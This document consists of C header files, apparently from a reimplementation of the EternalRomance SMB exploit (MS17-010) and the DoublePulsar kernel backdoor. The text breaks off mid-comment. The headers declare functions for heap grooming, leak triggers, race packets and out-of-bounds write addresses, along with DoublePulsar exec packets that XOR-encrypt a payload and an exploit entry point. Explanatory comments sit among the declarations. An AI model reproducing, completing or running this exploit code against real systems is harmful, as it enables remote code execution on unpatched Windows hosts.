--------------------------------------------------------------------------------
/smb.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #pragma once
3 | #ifndef UNICODE
4 | #define UNICODE
5 | #endif
6 | #include "treeconnectandx.h"
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include "ntcreateandx.h"
15 | #include "smbpacketstrings.h"
16 |
17 | #pragma intrinsic(memcpy, memset, memcmp)
18 | #pragma auto_inline(off)
19 |
20 | #pragma pack(push, 1)
21 |
// 32-byte SMB (CIFS) header, packed so it overlays the packet directly.
// The networking functions locate it at ThisPacket.pbdata + SMB_HEADER_OFFSET
// (MAKEPSMB) and validate Protocol against "\xFFSMB"; a non-zero
// Status.NtStatus in a response is copied into smb_info::srv_last_error.
typedef struct _SMB_HEADER {
	BYTE Protocol[4];         // 0xFF 'S' 'M' 'B' signature
	BYTE Command;
	union {                   // status as either DOS error class/code or NT status
		struct {
			BYTE ErrorClass;
			BYTE Reserved;
			WORD Error;
		}DosError;
		DWORD NtStatus;
	}Status;
	BYTE Flags;
	WORD Flags2;
	union {                   // 12 reserved bytes, alternatively PidHigh + security signature / key fields
		WORD Reserved[6];
		struct {
			WORD PidHigh;
			union {
				struct {
					DWORD Key;
					WORD Sid;
					WORD SequenceNumber;
					WORD Gid;
				};
				BYTE SecuritySignature[8];
			};
		};
	};
	WORD Tid;
	WORD Pid;
	WORD Uid;
	WORD Mid;
}SMB_HEADER, * PSMB_HEADER;
55 |
56 | #pragma pack(pop)
57 |
// Per-connection state shared across the SendRecv* helpers.  The identifiers
// below are read through the get_pid()/get_uid()/get_mid()/get_tid() and
// get_special_mid()/get_special_pid() accessors when requests are built.
// Not packed: this is host-side bookkeeping, not a wire structure.
struct smb_info {
	WORD fid;
	WORD tid;
	WORD pid;
	WORD uid;
	WORD mid;
	WORD special_mid;          // alternate multiplex id used by some TRANS_SECONDARY helpers
	WORD special_pid;          // alternate process id used by some TRANS_SECONDARY helpers
	UNICODE_STRING tree_connection;
	STRING tree_connect_andx_svc;
	BYTE AndxCommand;
	WORD AndxOffset;
	PVOID sockaddrpointer;
	PVOID socketpointer;
	PVOID wsapointer;
	DWORD_PTR connection_handle;
	DWORD srv_last_error;      // last non-zero NtStatus seen in a response (set by the SendRecv* helpers)
	BYTE headerinfo[32];
	BOOL DoublePulsarInstalled;
	WORD DoublePulsarXorKey;
	WORD TransIndataShiftCount;
	WORD TransFragTagOffset;
	WORD TransConnectionOffset;
	ULONG_PTR LastOOBReadAddress;
	ULONG_PTR LastOOBWriteAddress;
};
84 |
// Sized byte buffer.  Allocated/released through bwsalloc()/bwsfree(); the
// networking code reads dwsize as the byte length of pbdata.  Referred to as
// BUFFER throughout the sources even though the typedef name is BUFWITHSIZE.
typedef struct BUFFER {
	DWORD dwsize;   // number of bytes at pbdata
	PBYTE pbdata;   // heap buffer (NULL when unallocated)
}BUFWITHSIZE, * PBUFWITHSIZE;
89 |
// One captured transaction response plus pointers into it, as filled by the
// SendRecvTransSecondary*Race* helpers.  All pointers below alias
// KrnlLeakResponse.pbdata and become dangling if that buffer is freed.
struct LeakedDataLinkedList {
	BUFFER KrnlLeakResponse;      // private copy of the received response
	PDWORD ResponseNetbios;       // = pbdata (NetBIOS length prefix)
	PSMB_HEADER ResponseHeader;   // = pbdata + SMB_HEADER_OFFSET
	PBYTE ResponseParameters;     // = header + ParameterOffset (server-supplied, unchecked)
	PBYTE ResponseData;           // = header + DataOffset (server-supplied, unchecked)
	LeakedDataLinkedList* NextEntry;
};
98 |
// A received packet and cached pointers into it.  ThisSmb/ThisNetbiosSize
// alias ThisPacket.pbdata and are re-derived by the SendRecv* helpers
// whenever that buffer is reallocated.
struct ResponsePacketLinkedList {
	BUFFER ThisPacket;       // raw bytes as received, NetBIOS prefix included
	PSMB_HEADER ThisSmb;     // = pbdata + SMB_HEADER_OFFSET
	PVOID ThisNetbiosSize; //(WORD *)   = pbdata + NETBIOS_SIZE_OFFSET
	ResponsePacketLinkedList* NextEntry;
};
105 |
// A packet to send and cached pointers into it; same shape and aliasing rules
// as ResponsePacketLinkedList.
struct RequestPacketLinkedList {
	BUFFER ThisPacket;       // raw bytes to send, NetBIOS prefix included
	PSMB_HEADER ThisSmb;     // = pbdata + SMB_HEADER_OFFSET
	PVOID ThisNetbiosSize; //(WORD *)   = pbdata + NETBIOS_SIZE_OFFSET
	RequestPacketLinkedList* NextEntry;
};
112 |
113 | #pragma pack(push, 1)
114 |
/*
 * One pointer-sized word viewed through several pointer types. Every member
 * is sizeof(PVOID) wide (addressbytes[] is sized to match), so the union adds
 * nothing even inside the enclosing #pragma pack(push, 1) region. Only the
 * tag ANYPOINTER and the PANYPOINTER typedef are introduced; because the
 * union is anonymous its members are accessed directly (p.address,
 * p.pbpointer). Reading a member other than the one last written is type
 * punning -- MSVC accepts it, ISO C++ does not guarantee it.
 * find_memory_pattern() reports its hit through a PANYPOINTER.
 */
typedef struct ANYPOINTER {
    union {
        PVOID pvpointer;
        PBYTE pbpointer;
        PSTR ppointer;
        PWSTR pwpointer;
        ULONG_PTR address;                 /* integer view of the same value */
        ULONG_PTR* paddress;
        BYTE addressbytes[sizeof(PVOID)];  /* raw bytes of the pointer value */
    };
}*PANYPOINTER;
126 |
/*
 * Pointers into the most recently built TRANS2 SESSION_SETUP request. Each
 * member is a union of a typed pointer with an ANYPOINTER, so the same field
 * can be read as its proper type or as a raw address without a cast. Every
 * union is one pointer wide and the struct sits in a #pragma pack(push, 1)
 * region, so sizeof is 4 * sizeof(PVOID). PREQ_TRANSACTION2 and
 * PREQ_TRANSACTION2_SESSION_SETUP are not declared in this header
 * (presumably smbtransaction.h). Instances are allocated and released through
 * AllocateSmbLibLastTrans2SessionSetupRequestStructure() and
 * FreeSmbLibLastTrans2SessionSetupRequestStructure() declared below.
 */
typedef struct SMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST {
    union {
        ANYPOINTER AnyNetbiosSizeAddress;
        WORD* NetbiosSize;           /* presumably -> the 2-byte big-endian length at NETBIOS_SIZE_OFFSET */
    };

    union {
        ANYPOINTER SmbAnyAddress;
        PSMB_HEADER Smb;             /* presumably -> header at SMB_HEADER_OFFSET */
    };

    union {
        ANYPOINTER Transaction2AnyAddress;
        PREQ_TRANSACTION2 Trans2;    /* presumably -> TRANS2 parameter block following the header */
    };

    union {
        ANYPOINTER Trans2SessionSetupAnyAddress;
        PREQ_TRANSACTION2_SESSION_SETUP Trans2SessionSetup;
    };
}*PSMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST;
148 |
149 | #pragma pack(pop)
150 |
/*
 * Common signature of the packet builders declared below (negotiate_request_packet,
 * session_setup_packet, ...): fill *bws and return a PBYTE (presumably
 * bws->pbdata -- confirm in the .cpp). IN/OUT appear on both sides of the '*'
 * in these prototypes, so they must expand to nothing; they are documentation
 * only.
 */
typedef PBYTE(*packet_creation_handler_type_one)(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);

/*
 * Memory comparison returning a BOOL rather than memcmp's three-way ordering
 * (exact semantics of the result are not visible here; presumably defined in
 * smbutils.cpp). NOTE(review): identifiers that begin with a double
 * underscore are reserved for the implementation in both C and C++; a name
 * such as smb_memcmp would avoid any collision with the CRT.
 */
BOOL __cdecl __memcmp(const void* a, const void* b, DWORD size);

/*
 * Thin wrappers over the CRT. cpy and bzero widen size to size_t; cmp passes
 * it through as the DWORD __memcmp expects. bzero reuses the POSIX function
 * name, harmless on Windows but a clash with <strings.h> anywhere else.
 */
#define cpy(dst, src, size) (memcpy(dst, src, (size_t)(size)))
#define cmp(a, b, size) (__memcmp(a, b, size))
#define bzero(ptr, size) (memset((ptr), 0x00, (size_t)(size)))
158 |
159 |
160 | BOOL find_memory_pattern(BUFFER IN* bws, PANYPOINTER IN OUT result, const void* IN pattern, DWORD IN patternsize);
161 | VOID update_smb_info(smb_info* info, BUFFER* IN newpacket);
162 | void csprng(PBYTE buffer, DWORD size);
163 | unsigned int random(void);
164 |
165 | DWORD __stdcall FindLeakedTrans2DispatchTable(BUFFER IN* bws);
166 | DWORD __stdcall GetDoublePulsarStatusCode(BUFFER* IN bws, BUFFER IN* request);
167 | DWORD __stdcall GetDoublePulsarOpCode(BUFFER* IN bws);
168 | BOOL __stdcall GenerateDoublePulsarOpcodePacket(BUFFER* IN OUT bws, BYTE opcode);
169 | DWORD __stdcall GetDoublePulsarXorKey(BUFFER* IN bws);
170 | ULONG_PTR __stdcall GetOOBWriteAddress(BUFFER* IN packet);
171 |
172 | // parameters is output; opcode is input. If opcode == DOPU_EXEC_OPCODE, datalength points to the length of the payload; for the exec opcode, specify the DoPu argument.
173 | PBYTE GenerateDoublePulsarTrans2SessionSetupParameters(BUFFER* IN OUT parameters, DWORD IN opcode, DWORD* IN OPTIONAL datalength, DWORD IN OPTIONAL xorkey, PSMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST last_trans2_session_setup_req);//PBYTE GenerateDoublePulsarTrans2SessionSetupParameters(BUFFER* IN OUT parameters, DWORD IN opcode, DWORD *IN OPTIONAL datalength, DWORD IN OPTIONAL xorkey);
174 | PBYTE PadDoPuPayloadToProperSize(BUFFER IN OUT* payload);
175 | BOOL __stdcall XorEncryptPayload(BUFFER IN OUT* payload, DWORD IN xorkey);
176 |
177 |
178 | ULONG_PTR** __stdcall GetAllOOBReadAddressesFromMultiRequest(BUFFER* IN packet, DWORD IN smbcount);
179 | DWORD __stdcall FindLeakedDataFragTag(BUFFER IN* packet);
180 | DWORD __stdcall FindLeadedDataLStrTag(BUFFER IN* packet);
181 |
182 | BOOL AllocateSmbLibLastTrans2SessionSetupRequestStructure(SMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST** IN OUT pointertostructpointer, DWORD IN numbertoallocate);
183 | BOOL FreeSmbLibLastTrans2SessionSetupRequestStructure(SMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST** IN OUT pointertostructpointer);
184 |
185 | /*
186 | *
187 | *
188 | * memory allocation buffer with size functions
189 | *
190 | *
191 | */
192 |
193 | void bwsalloc(BUFFER OUT* bws, DWORD IN size);
194 | void bwsfree(BUFFER IN* bws);
195 | BOOL bwscat(BUFFER IN OUT* dst, BUFFER IN* src);
196 |
197 | BUFFER* OUT bwsnew(DWORD IN count);
198 | BOOL bwsdelete(BUFFER **IN OUT bws);
199 | BOOL bwsallocateandcopy(BUFFER IN OUT* bws, const void IN* src, DWORD IN size);
200 |
201 |
202 |
203 | /*
204 | *
205 | *
206 | * Linked list functions
207 | *
208 | *
209 | */
210 |
211 | void __stdcall FreeRequestLinkedListBuffers(RequestPacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
212 | void __stdcall FreeResponseLinkedListBuffers(ResponsePacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
213 | void __stdcall FreeLeakdataLinkedListBuffers(LeakedDataLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
214 | void __stdcall FreeRequestLinkedListSingleEntry(RequestPacketLinkedList* IN OUT entrypointer);
215 | void __stdcall FreeResponseLinkedListSingleEntry(ResponsePacketLinkedList* IN OUT entry);
216 |
217 | /*
218 | *
219 | *
220 | * STRING functions
221 | *
222 | *
223 | */
224 |
225 | void __stdcall InitString(PCSTR IN cstr, STRING* IN OUT str);
226 | void __stdcall FreeString(STRING* IN OUT str);
227 | void __stdcall InitUnicodeString(PCWSTR IN cstr, UNICODE_STRING* IN OUT str);
228 | void __stdcall FreeUnicodeString(UNICODE_STRING* IN OUT str);
229 | void __stdcall ConvertStringToUnicode(STRING* IN s, UNICODE_STRING* IN OUT u);
230 | void __stdcall ConvertUnicodeToString(UNICODE_STRING* IN u, STRING* IN OUT s);
231 | void DumpHex(const void* vdata, DWORD size);
232 |
233 | WORD get_pid(smb_info*);
234 | WORD get_uid(smb_info*);
235 | WORD get_mid(smb_info*);
236 | WORD get_tid(smb_info*);
237 | WORD get_fid(smb_info*);
238 | WORD get_special_mid(smb_info*);
239 | WORD get_special_pid(smb_info*);
240 | void set_pid(smb_info*, WORD);
241 | void set_uid(smb_info*, WORD);
242 | void set_mid(smb_info*, WORD);
243 | void set_tid(smb_info*, WORD);
244 | void set_fid(smb_info*, WORD);
245 | void set_special_mid(smb_info*, WORD);
246 | void set_special_pid(smb_info*, WORD);
247 |
248 |
249 | /*
250 | *
251 | *
252 | * networking functions
253 | *
254 | *
255 | */
256 |
257 | unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status);
258 | unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status);
259 | unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status);
260 | unsigned int CloseAndClearSocket(SOCKET IN OUT& sfd, BOOLEAN IN WSAClean);
261 |
262 |
263 | /*
264 | *
265 | *
266 | * begin smb packet creation functions
267 | *
268 | *
269 | */
270 |
271 | /*
272 | *
273 | *
274 | * EternalRomance packet creation functions
275 | *
276 | *
277 | */
278 |
279 | PBYTE negotiate_request_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
280 | PBYTE session_setup_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
281 | PBYTE tree_connect_packet(BUFFER IN OUT* bws, UNICODE_STRING* unc, WORD pid, WORD uid, WORD mid, WORD tid);
282 | PBYTE nt_create_andx_packet(BUFFER IN OUT* bws, WORD rootfid, WORD pid, WORD uid, WORD mid, WORD tid);
283 | PBYTE trans_dcerpc_bind_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
284 | PBYTE write_andx_lsarpc_getusername_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
285 | PBYTE trans_trigger_first_leak_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
286 | PBYTE trans_groom_type_one_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
287 | PBYTE trans_multirequest_type_one_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD* mids, WORD tid);
288 | PBYTE trans_multirequest_type_one_number_two_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD* mids, WORD tid);
289 | PBYTE trans_multirequest_type_one_number_three_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
290 | PBYTE trans_groom_type_two_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
291 | PBYTE trans_secondary_trigger_second_leak_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
292 | PBYTE write_andx_shift_indata_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid, WORD IN fid);
293 | PBYTE trans_secondary_mid_overwrite_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
294 | PBYTE trans_secondary_first_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
295 | PBYTE trans_secondary_first_special_mid_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
296 | PBYTE trans_secondary_race_type_one_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
297 | PBYTE trans_secondary_second_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
298 | PBYTE trans_secondary_race_type_two_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
299 | PBYTE trans_secondary_third_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
300 | PBYTE trans_secondary_second_race_type_two_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
301 | PBYTE trans_secondary_fourth_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
302 | PBYTE trans_secondary_third_race_type_two_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
303 | PBYTE nt_create_andx_second_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
304 | PBYTE trans_secondary_fifth_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
305 |
306 | /*
307 | *
308 | *
309 | * DoublePulsar smb packet creation functions
310 | *
311 | *
312 | */
313 |
314 | PBYTE trans2_session_setup_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
315 | PBYTE trans2_session_setup_dopu_kill(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
316 | PBYTE trans2_session_setup_dopu_ping(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
317 | PBYTE trans2_session_setup_dopu_exec(BUFFER IN OUT* bws, BUFFER IN* xorkeypacket, BUFFER IN* payload, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
318 |
319 | PBYTE tree_disconnect_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
320 | PBYTE logoff_andx_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
321 |
322 | PBYTE trans_peek_namedpipe_check_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
323 |
324 | BOOLEAN SendRecvNegotiate(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info);
325 | BOOLEAN SendRecvSessionSetupAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info);
326 | BOOLEAN SendRecvTreeConnectAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, PCWSTR IN ip);
327 | BOOLEAN SendRecvNtCreateAndx(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
328 | BOOLEAN SendRecvTransDcerpcBind(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
329 | BOOLEAN SendRecvLsaGetUsername(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
330 | BOOLEAN SendRecvTransFirstLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info);
331 | BOOLEAN SendRecvTransGroomTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
332 | BOOLEAN SendRecvTransFirstMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
333 | BOOLEAN SendRecvTransSecondMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
334 | BOOLEAN SendRecvTransThirdMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
335 | BOOLEAN SendRecvTransGroomTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
336 | BOOLEAN SendRecvTransSecondarySecondLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info);
337 | BOOLEAN SendRecvWriteAndxIndataShift(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
338 | BOOLEAN SendRecvTransSecondaryMultiplexOverwrite(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
339 | BOOLEAN SendRecvTransSecondaryFirstMuliplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
340 | BOOLEAN SendRecvTransSecondaryFirstSpecialMultiplex(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
341 | BOOLEAN SendRecvTransSecondaryRaceTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
342 | BOOLEAN SendRecvTransSecondarySecondMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
343 | BOOLEAN SendRecvTransSecondaryRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
344 | BOOLEAN SendRecvTransSecondaryThirdMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
345 | BOOLEAN SendRecvTransSecondarySecondRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
346 | BOOLEAN SendRecvTransSecondaryFourthMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
347 | BOOLEAN SendRecvTransSecondaryThirdRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
348 | BOOLEAN SendRecvSecondNtCreateAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
349 |
350 | /*
351 | *
352 | *
353 | *
354 | * DoublePulsar Networking Functions
355 | *
356 | *
357 | */
358 |
359 | BOOLEAN SendRecvTrans2SessionSetup(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
360 | BOOLEAN SendRecvTreeDisconnect(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
361 | BOOLEAN SendRecvLogoffAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
362 |
363 | /*
364 | *
365 | *
366 | *
367 | * Equation Group MS17-10 vulnerability check networking function
368 | *
369 | *
370 | */
371 | // sends a transaction PEEK_NMPIPE request on FID 0 and receives its response
372 | BOOLEAN SendRecvTransPeekNamedPipeCheck(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
373 |
374 |
375 | /*
376 | *
377 | *
378 | *
379 | * Threaded functions
380 | *
381 | *
382 | *
383 | */
384 |
385 | #ifdef _WIN64
386 | INT_PTR __stdcall MainExploitEntry(void);
387 | #else
388 | int __stdcall MainExploitEntry(void);
389 | #endif // _WIN64
390 |
391 |
392 | BOOLEAN __stdcall readfile(UNICODE_STRING* filename, BUFFER* IN OUT filedata);
393 | //BOOLEAN __stdcall writefile(UNICODE_STRING* filename, BUFFER* IN filedata);
394 |
395 |
396 | //DWORD __stdcall EternalRomanceIsVulnerableLeak(PVOID pvip);
397 | //DWORD __stdcall EternalRomanceExploit(PVOID pvip);
398 | //DWORD __stdcall DoublePulsarCheckIsInstalled(PVOID pvip);
399 | //DWORD __stdcall EquationGroupIsVulnerableCheck(PVOID pvip);
--------------------------------------------------------------------------------
/smbmacros.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "windowssocket.h"
3 | #define SMB_MACROS
4 | /*
5 | *
6 | * Smb.Flags Mask defines:
7 | *
8 | */
9 |
/*
 * Bit masks for SMB_HEADER.Flags (smb.h). Every hand-built request in
 * smbpacketstrings.h carries 0x18 in that byte, i.e. CASE_INSENSITIVE |
 * CANONICALIZED_PATHS with SMB_FLAGS_REPLY clear; a response has REPLY (0x80)
 * set, which is the cheapest way to tell the two apart when parsing.
 */
#define SMB_FLAGS_LOCK_AND_READ_OK 0x01
#define SMB_FLAGS_BUF_AVAIL 0x2
#define SMB_FLAGS_CASE_INSENSITIVE 0x08
#define SMB_FLAGS_CANONICALIZED_PATHS 0x10
#define SMB_FLAGS_OPLOCK 0x20
#define SMB_FLAGS_REPLY 0x80
16 |
17 | /*
18 | *
19 | *
20 | * Smb Macros
21 | *
22 | *
23 | */
24 |
/*
 * Typed load/store helpers over raw byte pointers. Each one is a type-punned,
 * possibly unaligned dereference (*(T *)p): MSVC on x86/x64 tolerates that,
 * ISO C/C++ gives no alignment or strict-aliasing guarantee. None of the Get*
 * forms byte-swap, so for the big-endian NetBIOS length at NETBIOS_SIZE_OFFSET
 * pair GetUshort with byteswap16. The Put* forms expand to an unparenthesised
 * assignment -- use them as statements, not inside a larger expression. None
 * of them checks that p + sizeof(T) is still inside the buffer; that check is
 * the caller's.
 */
#define GetSocket(sockptr) \
    *(SOCKET *)(sockptr)
#define PutSocket(dest, value) \
    *(SOCKET *)(dest) = (value)

#define GetUshort(src) \
    *(WORD *)(src)
#define PutUshort(dst, val) \
    *(WORD *)(dst) = (val)

#define GetUlong(src) \
    *(DWORD *)(src)
#define PutUlong(dst, val) \
    *(DWORD *)(dst) = (val)

#define GetUlongPtr(src) \
    *(DWORD_PTR*)(src)
#define PutUlongPtr(dst, val) \
    *(DWORD_PTR *)(dst) = (val)

#define GetUlonglong(src) \
    *(ULONGLONG*)(src)
#define PutUlonglong(dest, value) \
    *(ULONGLONG *)(dest) = (value)

#define GetUnsigned(src) \
    *(unsigned *)(src)
#define PutUnsigned(dst, val) \
    *(unsigned *)(dst) = (val)
54 |
55 |
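/*
 * Endian swaps. The NetBIOS length is big-endian on the wire while x86 is
 * little-endian, so these are needed for that field (see NETBIOS_SIZE_OFFSET).
 * byteswap16/byteswap32 now cast the operand to the result type before
 * shifting, so the work is done on an unsigned value of known width. The
 * previous byteswap32 shifted the promoted operand without a cast: for a
 * negative int argument "((value) & 0xFF) << 24" overflowed into the sign bit
 * (undefined behaviour), and a 64-bit argument produced a 64-bit intermediate.
 * byteswap64 is unchanged -- its ULL masks already force an unsigned 64-bit
 * promotion. All three evaluate their argument several times; do not pass
 * expressions with side effects.
 */
#define byteswap16(value) \
    ((WORD)(((((WORD)(value)) >> 8) & 0xFF) | ((((WORD)(value)) & 0xFF) << 8)))
#define byteswap32(value) \
    ((DWORD)(((((DWORD)(value)) & 0xFF000000UL) >> 24) | ((((DWORD)(value)) & 0x00FF0000UL) >> 8) | ((((DWORD)(value)) & 0x0000FF00UL) << 8) | ((((DWORD)(value)) & 0x000000FFUL) << 24)))
#define byteswap64(value) \
    ((((value) & 0xFF00000000000000ULL) >> 56) \
    | (((value) & 0x00FF000000000000ULL) >> 40) \
    | (((value) & 0x0000FF0000000000ULL) >> 24) \
    | (((value) & 0x000000FF00000000ULL) >> 8) \
    | (((value) & 0x00000000FF000000ULL) << 8) \
    | (((value) & 0x0000000000FF0000ULL) << 24) \
    | (((value) & 0x000000000000FF00ULL) << 40) \
    | (((value) & 0x00000000000000FFULL) << 56))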
69 |
/*
 * Predicates over the Winsock sentinels and NULL. In each one the (BOOLEAN)
 * cast binds to the comparison, so the expansion is
 * "(BOOLEAN)(a == b) ? TRUE : FALSE" and the whole expression has the type of
 * TRUE/FALSE (int), not BOOLEAN. badsock/validsock and isnull/notnull are
 * exact complements of each other.
 */
#define badsock(sfd) \
    ((BOOLEAN)((sfd) == INVALID_SOCKET) ? TRUE : FALSE)
#define validsock(sfd) \
    ((BOOLEAN)((sfd) != INVALID_SOCKET) ? TRUE : FALSE)

#define isnull(x) \
    ((BOOLEAN)((x) == NULL) ? TRUE : FALSE)
#define notnull(x) \
    ((BOOLEAN)((x) != NULL) ? TRUE : FALSE)

#define issockerr(status) \
    ((BOOLEAN)((status) == SOCKET_ERROR) ? TRUE : FALSE)
82 |
/*
 * Bare C-style cast wrappers. They add readability only: no range or type
 * checking happens, so a PBYTE produced by MAKEPBYTE and then read through
 * GetUlong() is entirely unchecked. Validate lengths before casting received
 * data with these.
 */
#define MAKEUNSIGNED(x) \
    ((unsigned)(x))
#define MAKEPBYTE(x) \
    ((PBYTE)(x))
#define MAKEPSMB(x) \
    ((PSMB_HEADER)(x))
#define MAKEPWSTR(x) \
    ((PWSTR)(x))
#define MAKEPCWSTR(x) \
    ((PCWSTR)(x))
#define MAKEPWORD(x) \
    ((WORD *)(x))
#define MAKEPDWORD(x) \
    ((DWORD *)(x))
#define MAKEPVOID(x) \
    ((PVOID)(x))
#define MAKESIZET(x) \
    ((SIZE_T)(x))
101 |
/*
 * Diagnostics. errmsg takes a narrow function name (%S), a line number and an
 * error code, and writes to stderr. _dbgprint writes to stdout and dbgprint to
 * stderr -- the leading underscore selects the stream, it does not mean
